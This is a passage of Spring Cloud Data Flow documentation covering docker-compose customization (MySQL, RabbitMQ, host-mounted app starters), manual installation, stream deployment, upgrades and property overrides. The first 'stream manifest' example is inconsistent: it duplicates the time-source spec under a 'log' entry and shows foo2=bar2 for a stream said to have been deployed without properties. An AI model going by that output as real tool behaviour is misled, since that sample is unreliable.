the `docker-compose.yml` file, as the following sections describe.\n\n[[getting-started-local-customizing-spring-cloud-dataflow-docker-mysql]]\n===== Using MySQL Rather than the H2 Embedded Database\n\nYou can use MySQL rather than the H2 embedded database.\nTo do so:\n\n. Add the following configuration under the `services` section:\n+\n====\n[source,yaml,subs=attributes]\n----\n mysql:\n image: mysql:5.7.25\n environment:\n MYSQL_DATABASE: dataflow\n MYSQL_USER: root\n MYSQL_ROOT_PASSWORD: rootpw\n expose:\n - 3306\n----\n====\n\n. Add the following entries to the `environment` block of the `dataflow-server` service definition:\n+\n====\n[source,yaml,subs=attributes]\n----\n - spring.datasource.url=jdbc:mysql:\/\/mysql:3306\/dataflow\n - spring.datasource.username=root\n - spring.datasource.password=rootpw\n - spring.datasource.driver-class-name=org.mariadb.jdbc.Driver\n----\n====\n\n
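To check that the server actually picked up MySQL, you can query the database that the compose service creates. This is a sketch under the assumptions above (service name `mysql`, root password `rootpw`, database `dataflow`), not an official verification step:\n\n====\n[source,bash]\n----\n# Confirm the dataflow schema was created inside the mysql container;\n# the credentials match the environment block shown above.\n$ docker exec -it mysql mysql -uroot -prootpw -e 'SHOW TABLES IN dataflow;'\n----\n====\n\n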
[[getting-started-local-customizing-spring-cloud-dataflow-docker-rabbitmq]]\n===== Using RabbitMQ Instead of Kafka for Communication\n\nYou can use RabbitMQ rather than Kafka for communication. To do so:\n\n. Replace the following configuration under the `services` section:\n+\n====\n[source,yaml,subs=attributes]\n----\n kafka:\n image: wurstmeister\/kafka:2.11-0.11.0.3\n expose:\n - "9092"\n environment:\n - KAFKA_ADVERTISED_PORT=9092\n - KAFKA_ZOOKEEPER_CONNECT=zookeeper:2181\n - KAFKA_ADVERTISED_HOST_NAME=kafka\n zookeeper:\n image: wurstmeister\/zookeeper\n expose:\n - "2181"\n----\n====\n+\nWith the following:\n+\n====\n[source,yaml,subs=attributes]\n----\n rabbitmq:\n image: rabbitmq:3.7\n expose:\n - "5672"\n----\n====\n\n. In the `dataflow-server` services configuration block, add the following `environment` entry:\n+\n====\n[source,yaml,subs=attributes]\n----\n - spring.cloud.dataflow.applicationProperties.stream.spring.rabbitmq.host=rabbitmq\n----\n====\n\n. Replace the following:\n+\n====\n[source,yaml,subs=attributes]\n----\n depends_on:\n - kafka\n----\n====\n+\nWith:\n+\n====\n[source,yaml,subs=attributes]\n----\n depends_on:\n - rabbitmq\n----\n====\n\n. Modify the `app-import` service definition `command` attribute to replace `http:\/\/bit.ly\/Einstein-SR2-stream-applications-kafka-maven` with `http:\/\/bit.ly\/Einstein-SR2-stream-applications-rabbit-maven`.\n\n
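To verify that deployed streams really bind through RabbitMQ after this change, you can ask the broker for its queues. The following is a sketch, assuming the `rabbitmq` service name used above and at least one deployed stream:\n\n====\n[source,bash]\n----\n# List the queues that the deployed stream applications create on the broker.\n$ docker exec -it rabbitmq rabbitmqctl list_queues\n----\n====\n\n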
[[getting-started-local-customizing-spring-cloud-dataflow-docker-app-starters]]\n===== Enabling App Starters from the Host\n\nYou can register `app starters` directly from the host machine.\nTo do so:\n\n. Mount the source host folders to the `dataflow-server` container.\n+\nFor example, if the `my-app.jar` is in the `\/foo\/bar\/apps` folder on your host machine, add the following `volumes` block to the `dataflow-server` service definition:\n+\n====\n[source,yaml,subs=attributes]\n----\n dataflow-server:\n image: springcloud\/spring-cloud-dataflow-server:${DATAFLOW_VERSION}\n container_name: dataflow-server\n ports:\n - "9393:9393"\n environment:\n - spring.cloud.dataflow.applicationProperties.stream.spring.cloud.stream.kafka.binder.brokers=kafka:9092\n - spring.cloud.dataflow.applicationProperties.stream.spring.cloud.stream.kafka.binder.zkNodes=zookeeper:2181\n volumes:\n - \/foo\/bar\/apps:\/root\/apps\n----\n====\n\nThis configuration provides access to the `my-app.jar` (and the other files in the folder) from within the container's `\/root\/apps\/` folder. See the https:\/\/docs.docker.com\/compose\/compose-file\/compose-file-v2\/[compose-file reference] for further configuration details.\n\nNOTE: The explicit volume mounting couples docker-compose to your host's file system, limiting the portability to other machines and operating systems. Unlike `docker`, `docker-compose` does not allow volume mounting from the command line (for example, there is no `-v` parameter). Instead, you can define a placeholder environment variable (such as `HOST_APP_FOLDER`) in place of the hardcoded path by using `- ${HOST_APP_FOLDER}:\/root\/apps` and setting this variable before starting docker-compose.\n\nOnce you mount the host folder, you can register the app starters (from `\/root\/apps`) with the SCDF https:\/\/docs.spring.io\/spring-cloud-dataflow\/docs\/current\/reference\/htmlsingle\/#shell[Shell] or https:\/\/docs.spring.io\/spring-cloud-dataflow\/docs\/current\/reference\/htmlsingle\/#dashboard-apps[Dashboard] by using the `file:\/\/` URI schema.\nThe following example shows how to do so:\n\n====\n[source,bash,subs=attributes]\n----\ndataflow:>app register --type source --name my-app --uri file:\/\/root\/apps\/my-app-1.0.0.RELEASE.jar\n----\n====\n\nNOTE: You also need to use `--metadata-uri` if the metadata jar is available in `\/root\/apps`.\n\nTo access the host's local Maven repository from within the `dataflow-server` container, you should mount the host Maven local repository (defaults to `~\/.m2` for OSX and Linux and `C:\\Documents and Settings\\{your-username}\\.m2` for Windows) to a `dataflow-server` volume called `\/root\/.m2\/`. For MacOS or Linux host machines, this looks like the following:\n\n====\n[source,yaml,subs=attributes]\n----\n dataflow-server:\n .........\n volumes:\n - ~\/.m2:\/root\/.m2\n----\n====\n\nNow you can use the `maven:\/\/` URI schema and Maven coordinates to resolve jars installed in the host's Maven repository, as the following example shows:\n\n====\n[source,bash,subs=attributes]\n----\ndataflow:>app register --type processor --name pose-estimation --uri maven:\/\/org.springframework.cloud.stream.app:pose-estimation-processor-rabbit:2.0.2.BUILD-SNAPSHOT --metadata-uri maven:\/\/org.springframework.cloud.stream.app:pose-estimation-processor-rabbit:jar:metadata:2.0.2.BUILD-SNAPSHOT\n----\n====\n\nThis approach lets you share jars that are built and installed on the host machine (for example, by using `mvn clean install`) directly with the dataflow-server container.\n\nYou can also pre-register the apps directly in the `docker-compose.yml` file. For every pre-registered app starter, add an additional `wget` statement to the `app-import` block configuration, as the following example shows:\n\n====\n[source,yaml,subs=attributes]\n----\n app-import:\n image: alpine:3.7\n command: >\n \/bin\/sh -c "\n ....\n wget -qO- 'http:\/\/dataflow-server:9393\/apps\/source\/my-app' --post-data='uri=file:\/root\/apps\/my-app.jar&metadata-uri=file:\/root\/apps\/my-app-metadata.jar';\n echo 'My custom apps imported'"\n----\n====\n\nSee the https:\/\/docs.spring.io\/spring-cloud-dataflow\/docs\/current\/reference\/htmlsingle\/#resources-registered-applications[SCDF REST API] for further details.\n\n
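The same REST endpoint can also be exercised from the host once the server is up, which is handy for trying out a registration before baking it into the compose file. The following is a hedged `curl` equivalent of the `wget` call above (it assumes the server is reachable on `localhost:9393`):\n\n====\n[source,bash]\n----\n# Register a source app over the REST API from the host; this mirrors the\n# wget call in the app-import block above.\n$ curl -X POST 'http:\/\/localhost:9393\/apps\/source\/my-app' -d 'uri=file:\/root\/apps\/my-app.jar&metadata-uri=file:\/root\/apps\/my-app-metadata.jar'\n----\n====\n\n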
[[getting-started-local-deploying-spring-cloud-dataflow]]\n=== Getting Started with Manual Installation\n\nIf Docker does not suit your needs, you can manually install the parts you need to run Spring Cloud Data Flow. To do so:\n\n. Download the Spring Cloud Data Flow Server by using the following command:\n+\n====\n[source,bash,subs=attributes]\n----\nwget https:\/\/repo.spring.io\/{version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-dataflow-server\/{project-version}\/spring-cloud-dataflow-server-{project-version}.jar\n----\n====\n\n. Download the Spring Cloud Data Flow Shell application by using the following command:\n+\n====\n[source,bash,subs=attributes]\n----\nwget https:\/\/repo.spring.io\/{version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-dataflow-shell\/{project-version}\/spring-cloud-dataflow-shell-{project-version}.jar\n----\n====\n\n. If you need to enable Stream features, download http:\/\/cloud.spring.io\/spring-cloud-skipper\/[Skipper] (because Data Flow delegates to Skipper for those features) by running the following commands:\n+\n====\n[source,bash,options=nowrap,subs=attributes]\n----\nwget https:\/\/repo.spring.io\/{skipper-version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-skipper-server\/{skipper-version}\/spring-cloud-skipper-server-{skipper-version}.jar\n\nwget https:\/\/repo.spring.io\/{skipper-version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-skipper-shell\/{skipper-version}\/spring-cloud-skipper-shell-{skipper-version}.jar\n----\n====\n\nIMPORTANT: These instructions require that RabbitMQ be running on the same machine as Skipper and the Spring Cloud Data Flow server and shell.\n\n. Launch Skipper (required unless the Stream features are disabled and Spring Cloud Data Flow runs in Task mode only). To do so, in the directory where you downloaded Skipper, run the server by using `java -jar`, as follows:\n+\n====\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-skipper-server-{skipper-version}.jar\n----\n====\n\n. Launch the Data Flow Server.\n+\nIn a different terminal window and in the directory where you downloaded Data Flow, run the server by using `java -jar`, as follows:\n+\n====\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-server-{project-version}.jar\n----\n====\n+\nIf Skipper and the Data Flow server are not running on the same host, set the `spring.cloud.skipper.client.serverUri` configuration property to the location of Skipper, as shown in the following example:\n+\n====\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-server-{project-version}.jar --spring.cloud.skipper.client.serverUri=http:\/\/198.51.100.1:7577\/api\n----\n====\n\n. In another terminal window, launch the Data Flow Shell by running the following command:\n+\n====\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-shell-{project-version}.jar\n----\n====\n\nIf the Data Flow Server and shell are not running on the same host, point the shell to the Data Flow server URL by using the `dataflow config server` command in the shell's interactive mode, as the following example shows:\n\n====\n[source,bash]\n----\nserver-unknown:>dataflow config server http:\/\/198.51.100.0\nSuccessfully targeted http:\/\/198.51.100.0\ndataflow:>\n----\n====\n\nAlternatively, you can pass in the `--dataflow.uri` command line option. The shell's `--help` command line option shows what is available.\n\nIMPORTANT: If you run Spring Cloud Data Flow Server behind a proxy server (such as\nhttps:\/\/github.com\/Netflix\/zuul[Zuul]), you may also need to set the\n`server.use-forward-headers` property to `true`. An example that uses Zuul is available in the\nhttps:\/\/github.com\/spring-cloud\/spring-cloud-dataflow-samples\/tree\/master\/dataflow-zuul[Spring Cloud Data Flow Samples repository]\non GitHub. Additional information is also available in the\nhttps:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/htmlsingle\/#howto-use-tomcat-behind-a-proxy-server[Spring Boot Reference Guide].\n\n
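As with the Docker Compose setup, a manually launched Data Flow server defaults to the embedded H2 database. If you want it to use an external database instead, the same `spring.datasource` properties shown in the MySQL customization earlier can be passed on the command line. The values below are examples only; the URL, credentials, and driver depend on your database:\n\n====\n[source,bash,subs=attributes]\n----\n# Point the server at an external MySQL database instead of embedded H2\n# (example values; substitute your own URL, credentials, and driver).\n$ java -jar spring-cloud-dataflow-server-{project-version}.jar --spring.datasource.url=jdbc:mysql:\/\/localhost:3306\/dataflow --spring.datasource.username=root --spring.datasource.password=rootpw --spring.datasource.driver-class-name=org.mariadb.jdbc.Driver\n----\n====\n\n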
[[getting-started-local-deploying-streams-spring-cloud-dataflow]]\n=== Deploying Streams\n\nDeploying streams requires that you first register some stream applications. By default, the application registry is empty.\nAs an example, register two applications, `http` and `log`, that communicate by using RabbitMQ. To do so, run the following commands:\n\n====\n[source,bash]\n----\ndataflow:>app register --name http --type source --uri maven:\/\/org.springframework.cloud.stream.app:http-source-rabbit:1.2.0.RELEASE\nSuccessfully registered application 'source:http'\n\ndataflow:>app register --name log --type sink --uri maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit:1.1.0.RELEASE\nSuccessfully registered application 'sink:log'\n----\n====\n\nFor more details, such as how to register applications that are based on Docker containers or use Kafka as the messaging middleware, see the section on how to <<streams.adoc#spring-cloud-dataflow-register-stream-apps, register applications>>.\n\nNOTE: Depending on your environment, you may need to configure the Data Flow Server to point to a custom\nMaven repository location or configure proxy settings. See <<configuration-maven>> for more information.\n\nNow that you have registered the stream applications, you can create a stream. To do so, use the following `stream create` command to create a stream with an `http` source and a `log` sink and deploy it:\n\n====\n[source,bash]\n----\ndataflow:>stream create --name httptest --definition "http --server.port=9000 | log" --deploy\n----\n====\n\nNOTE: You need to wait a little while, until the apps are actually deployed successfully, before posting data.\nYou can look in the log file of the Skipper server for the location of the log files for the `http` and `log` applications.\nYou can use the `tail` command on the log file for each application to verify that the application has started.\n\nOnce the stream has started, you can post some data, as shown in the following example:\n\n====\n[source,bash]\n----\ndataflow:>http post --target http:\/\/localhost:9000 --data "hello world"\n----\n====\n\nNow you should check whether `hello world` ended up in the log file for the `log` application.\nThe location of the log file for the `log` application appears in the Data Flow server's log.\n\nNOTE: When deploying locally, each app (and each app instance, in case of `count > 1`) gets a dynamically assigned `server.port`, unless you explicitly assign one with `--server.port=x`.\nIn both cases, this setting is propagated as a configuration property that overrides any lower-level setting that you may have used (for example, in `application.yml` files).\n\nThe following sections show how to update and roll back streams by using the Local Data Flow server and Skipper.\nIf you run the Unix `jps` command, you can see the two Java processes running, as shown in the following listing:\n\n====\n[source,bash]\n----\n$ jps | grep rabbit\n12643 log-sink-rabbit-1.1.0.RELEASE.jar\n12645 http-source-rabbit-1.2.0.RELEASE.jar\n----\n====\n\n
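Before making any changes, `stream list` is a quick way to confirm the deployment state from the shell (the exact table layout depends on your shell version, so the output is omitted here):\n\n====\n[source,bash]\n----\ndataflow:>stream list\n----\n====\n\n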
[[getting-started-local-spring-cloud-dataflow-streams-upgrading]]\n==== Upgrading\n\nBefore we start upgrading the log-sink version to 1.2.0.RELEASE, we have to register that version in the app registry.\nThe following command does so:\n\n====\n[source,bash]\n----\ndataflow:>app register --name log --type sink --uri maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit:1.2.0.RELEASE\nSuccessfully registered application 'sink:log'\n----\n====\n\nSince we are using the local server, we need to set the port of the log sink to a value (9002) that does not conflict with the http source's port of 9000.\nWhile we are at it, we update the log level to `ERROR`.\nTo do so, we create a YAML file, named `local-log-update.yml`, with the following contents:\n\n====\n[source,yaml]\n----\nversion:\n log: 1.2.0.RELEASE\napp:\n log:\n server.port: 9002\n log.level: ERROR\n----\n====\n\nNow we can update the stream, as follows:\n\n====\n[source,bash]\n----\ndataflow:> stream update --name httptest --propertiesFile \/home\/mpollack\/local-log-update.yml\nUpdate request has been sent for the stream 'httptest'\n----\n====\n\nBy running the Unix `jps` command, you can see the two Java processes running, but now the log application is version 1.2.0.RELEASE, as shown in the following listing:\n\n====\n[source,bash]\n----\n$ jps | grep rabbit\n22034 http-source-rabbit-1.2.0.RELEASE.jar\n22031 log-sink-rabbit-1.2.0.RELEASE.jar\n----\n====\n\nNow you can look in the log file of the Skipper server.\nTo do so, use the following commands (note that the directory names may not exactly match this example, because the numeric prefix changes):\n\n====\n[source,bash]\n----\ncd \/tmp\/spring-cloud-dataflow-5262910238261867964\/httptest-1511749222274\/httptest.log-v2\ntail -f stdout_0.log\n----\n====\n\nYou should see log entries similar to the following:\n\n====\n[source,bash,options=nowrap]\n----\nINFO 12591 --- [ StateUpdate-1] o.s.c.d.spi.local.LocalAppDeployer : Deploying app with deploymentId httptest.log-v2 instance 0.\n Logs will be in \/tmp\/spring-cloud-dataflow-5262910238261867964\/httptest-1511749222274\/httptest.log-v2\nINFO 12591 --- [ StateUpdate-1] o.s.c.s.s.d.strategies.HealthCheckStep : Waiting for apps in release httptest-v2 to be healthy.\nINFO 12591 --- [ StateUpdate-1] o.s.c.s.s.d.s.HandleHealthCheckStep : Release httptest-v2 has been DEPLOYED\nINFO 12591 --- [ StateUpdate-1] o.s.c.s.s.d.s.HandleHealthCheckStep : Apps in release httptest-v2 are healthy.\n----\n====\n\nNow you can post a message to the http source at port `9000`, as follows:\n\n====\n[source,bash]\n----\ndataflow:> http post --target http:\/\/localhost:9000 --data "hello world upgraded"\n----\n====\n\nThe log message is now at the error level, as shown in the following example:\n\n====\n[source,bash]\n----\nERROR 22311 --- [http.httptest-1] log-sink : hello world upgraded\n----\n====\n\nIf you query the `\/info` endpoint of the application, you can also see that it is at version `1.2.0.RELEASE`, as shown in the following example:\n\n====\n[source,bash]\n----\n$ curl http:\/\/localhost:9002\/info\n{"app":{"description":"Spring Cloud Stream Log Sink Rabbit Binder Application","name":"log-sink-rabbit","version":"1.2.0.RELEASE"}}\n----\n====\n\n
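The intro to this section also mentioned rolling back. Although a full walkthrough is beyond this guide, the shell provides a `stream rollback` command that returns a stream to an earlier version; the following is a sketch (run `help stream rollback` in your shell to see the options available in your version):\n\n====\n[source,bash]\n----\ndataflow:>stream rollback --name httptest\n----\n====\n\n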
===== Forcing the Upgrade of a Stream\n\nWhen upgrading a stream, you can use the `--force` option to deploy new instances of currently deployed applications even if no application or deployment properties have changed.\nThis behavior is needed when configuration information is obtained by the application itself at startup time -- for example, from Spring Cloud Config Server.\nYou can specify which applications to force upgrade by using the `--app-names` option.\nIf you do not specify any application names, all the applications are force upgraded.\nYou can specify the `--force` and `--app-names` options together with the `--properties` or `--propertiesFile` options.\n\n===== Overriding Properties During Stream Update\n\nThe properties that are passed during stream update are added on top of the existing properties for the same stream.\n\nFor instance, the `ticktock` stream is deployed without any explicit properties, as follows:\n\n====\n[source,bash]\n----\ndataflow:>stream create --name ticktock --definition "time | log --name=mylogger"\nCreated new stream 'ticktock'\n\ndataflow:>stream deploy --name ticktock\nDeployment request has been sent for stream 'ticktock'\n----\n====\n\nYou can view the manifest for the `ticktock` stream by using the `stream manifest` command, as the following example shows:\n\n====\n[source,bash]\n----\ndataflow:>stream manifest --name ticktock\n"apiVersion": "skipper.spring.io\/v1"\n"kind": "SpringCloudDeployerApplication"\n"metadata":\n "name": "time"\n"spec":\n "resource": "maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit"\n "resourceMetadata": "maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit:jar:metadata:1.3.1.RELEASE"\n "version": "1.3.1.RELEASE"\n "applicationProperties":\n "spring.metrics.export.triggers.application.includes": "integration**"\n "spring.cloud.dataflow.stream.app.label": "time"\n "spring.cloud.stream.metrics.key": "ticktock.time.${spring.cloud.application.guid}"\n "spring.cloud.stream.bindings.output.producer.requiredGroups": "ticktock"\n "spring.cloud.stream.metrics.properties": "spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*"\n "spring.cloud.stream.bindings.output.destination": "ticktock.time"\n "spring.cloud.dataflow.stream.name": "ticktock"\n "spring.cloud.dataflow.stream.app.type": "source"\n "deploymentProperties":\n "spring.cloud.deployer.group": "ticktock"\n---\n"apiVersion": "skipper.spring.io\/v1"\n"kind": "SpringCloudDeployerApplication"\n"metadata":\n "name": "log"\n"spec":\n "resource": 
\"maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit\"\n \"resourceMetadata\": \"maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit:jar:metadata:1.3.1.RELEASE\"\n \"version\": \"1.3.1.RELEASE\"\n \"applicationProperties\":\n \"spring.metrics.export.triggers.application.includes\": \"integration**\"\n \"spring.cloud.dataflow.stream.app.label\": \"time\"\n \"spring.cloud.stream.metrics.key\": \"ticktock.time.${spring.cloud.application.guid}\"\n \"spring.cloud.stream.bindings.output.producer.requiredGroups\": \"ticktock\"\n \"spring.cloud.stream.metrics.properties\": \"spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\"\n \"spring.cloud.stream.bindings.output.destination\": \"ticktock.time\"\n \"spring.cloud.dataflow.stream.name\": \"ticktock\"\n \"spring.cloud.dataflow.stream.app.type\": \"source\"\n \"deploymentProperties\":\n \"spring.cloud.deployer.group\": \"ticktock\"\n---\n\"apiVersion\": \"skipper.spring.io\/v1\"\n\"kind\": \"SpringCloudDeployerApplication\"\n\"metadata\":\n \"name\": \"log\"\n\"spec\":\n \"resource\": \"maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit\"\n \"resourceMetadata\": \"maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit:jar:metadata:1.3.1.RELEASE\"\n \"version\": \"1.3.1.RELEASE\"\n \"applicationProperties\":\n \"spring.metrics.export.triggers.application.includes\": \"integration**\"\n \"spring.cloud.dataflow.stream.app.label\": \"log\"\n \"spring.cloud.stream.metrics.key\": \"ticktock.log.${spring.cloud.application.guid}\"\n \"spring.cloud.stream.bindings.input.group\": \"ticktock\"\n \"log.name\": \"mylogger\"\n \"spring.cloud.stream.metrics.properties\": \"spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\"\n \"spring.cloud.dataflow.stream.name\": \"ticktock\"\n \"spring.cloud.dataflow.stream.app.type\": \"sink\"\n \"foo2\": \"bar2\" \/\/ <1>\n \"spring.cloud.stream.bindings.input.destination\": \"ticktock.time\"\n \"deploymentProperties\":\n \"spring.cloud.deployer.count\": \"1\"\n \"spring.cloud.deployer.group\": \"ticktock\"\n\ndataflow:>stream list\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2551Stream Name\u2502 Stream Definition \u2502 Status \u2551\n\u2560\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563\n\u2551ticktock \u2502time | log --log.name=mylogger --foo2=bar2\u2502The stream has been successfully 
deployed\u2551\n\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n\n----\n\n<1> Property `foo2=bar2` is applied for the `log` application.\n====\n\nNow, when we add another property `foo3=bar3` to the `log` application, this new property is added on top of the existing properties for the stream `ticktock`. The following example shows the command to do so and the result:\n\n====\n[source,bash]\n----\ndataflow:>stream update --name ticktock --properties app.log.foo3=bar3\nUpdate request has been sent for the stream 'ticktock'\n\ndataflow:>stream manifest --name ticktock\n\"apiVersion\": \"skipper.spring.io\/v1\"\n\"kind\": \"SpringCloudDeployerApplication\"\n\"metadata\":\n \"name\": \"time\"\n\"spec\":\n \"resource\": \"maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit\"\n \"resourceMetadata\": \"maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit:jar:metadata:1.3.1.RELEASE\"\n \"version\": \"1.3.1.RELEASE\"\n \"applicationProperties\":\n \"spring.metrics.export.triggers.application.includes\": \"integration**\"\n \"spring.cloud.dataflow.stream.app.label\": \"time\"\n \"spring.cloud.stream.metrics.key\": \"ticktock.time.${spring.cloud.application.guid}\"\n \"spring.cloud.stream.bindings.output.producer.requiredGroups\": \"ticktock\"\n \"spring.cloud.stream.metrics.properties\": \"spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\"\n \"spring.cloud.stream.bindings.output.destination\": \"ticktock.time\"\n \"spring.cloud.dataflow.stream.name\": \"ticktock\"\n \"spring.cloud.dataflow.stream.app.type\": \"source\"\n \"deploymentProperties\":\n \"spring.cloud.deployer.group\": \"ticktock\"\n---\n\"apiVersion\": \"skipper.spring.io\/v1\"\n\"kind\": \"SpringCloudDeployerApplication\"\n\"metadata\":\n \"name\": \"log\"\n\"spec\":\n \"resource\": \"maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit\"\n \"resourceMetadata\": \"maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit:jar:metadata:1.3.1.RELEASE\"\n \"version\": \"1.3.1.RELEASE\"\n \"applicationProperties\":\n \"spring.metrics.export.triggers.application.includes\": \"integration**\"\n \"spring.cloud.dataflow.stream.app.label\": \"log\"\n \"spring.cloud.stream.metrics.key\": \"ticktock.log.${spring.cloud.application.guid}\"\n \"spring.cloud.stream.bindings.input.group\": \"ticktock\"\n \"log.name\": \"mylogger\"\n \"spring.cloud.stream.metrics.properties\": \"spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\"\n \"spring.cloud.dataflow.stream.name\": \"ticktock\"\n \"spring.cloud.dataflow.stream.app.type\": \"sink\"\n \"foo2\": \"bar2\" <1>\n \"spring.cloud.stream.bindings.input.destination\": \"ticktock.time\"\n \"foo3\": \"bar3\" <1>\n \"deploymentProperties\":\n \"spring.cloud.deployer.count\": \"1\"\n \"spring.cloud.deployer.group\": \"ticktock\"\n----\n\n<1> The property `foo3=bar3` is added along with the existing `foo2=bar2` for the `log` 
application.\n====\n\nWe can still override the existing properties, as follows:\n\n====\n[source,bash]\n----\ndataflow:>stream update --name ticktock --properties app.log.foo3=bar4\nUpdate request has been sent for the stream 'ticktock'\n\ndataflow:>stream manifest ticktock\n\"apiVersion\": \"skipper.spring.io\/v1\"\n\"kind\": \"SpringCloudDeployerApplication\"\n\"metadata\":\n \"name\": \"time\"\n\"spec\":\n \"resource\": \"maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit\"\n \"resourceMetadata\": \"maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit:jar:metadata:1.3.1.RELEASE\"\n \"version\": \"1.3.1.RELEASE\"\n \"applicationProperties\":\n \"spring.metrics.export.triggers.application.includes\": \"integration**\"\n \"spring.cloud.dataflow.stream.app.label\": \"time\"\n \"spring.cloud.stream.metrics.key\": \"ticktock.time.${spring.cloud.application.guid}\"\n \"spring.cloud.stream.bindings.output.producer.requiredGroups\": \"ticktock\"\n \"spring.cloud.stream.metrics.properties\": \"spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\"\n \"spring.cloud.stream.bindings.output.destination\": \"ticktock.time\"\n \"spring.cloud.dataflow.stream.name\": \"ticktock\"\n \"spring.cloud.dataflow.stream.app.type\": \"source\"\n \"deploymentProperties\":\n \"spring.cloud.deployer.group\": \"ticktock\"\n---\n\"apiVersion\": \"skipper.spring.io\/v1\"\n\"kind\": \"SpringCloudDeployerApplication\"\n\"metadata\":\n \"name\": \"log\"\n\"spec\":\n \"resource\": \"maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit\"\n \"resourceMetadata\": \"maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit:jar:metadata:1.3.1.RELEASE\"\n \"version\": \"1.3.1.RELEASE\"\n \"applicationProperties\":\n \"spring.metrics.export.triggers.application.includes\": \"integration**\"\n \"spring.cloud.dataflow.stream.app.label\": \"log\"\n \"spring.cloud.stream.metrics.key\": \"ticktock.log.${spring.cloud.application.guid}\"\n \"spring.cloud.stream.bindings.input.group\": \"ticktock\"\n \"log.name\": \"mylogger\"\n \"spring.cloud.stream.metrics.properties\": \"spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\"\n \"spring.cloud.dataflow.stream.name\": \"ticktock\"\n \"spring.cloud.dataflow.stream.app.type\": \"sink\"\n \"foo2\": \"bar2\" <1>\n \"spring.cloud.stream.bindings.input.destination\": \"ticktock.time\"\n \"foo3\": \"bar4\" <1>\n \"deploymentProperties\":\n \"spring.cloud.deployer.count\": \"1\"\n \"spring.cloud.deployer.group\": \"ticktock\"\n----\n\n<1> The property `foo3` is replaced with the new value `bar4`, and the existing property `foo2=bar2` remains.\n====\n\n===== Stream History\n\nYou can view the history of a stream by running the `stream history` command, as shown (with its output) in the following example:\n\n====\n[source,bash]\n----\ndataflow:>stream history --name 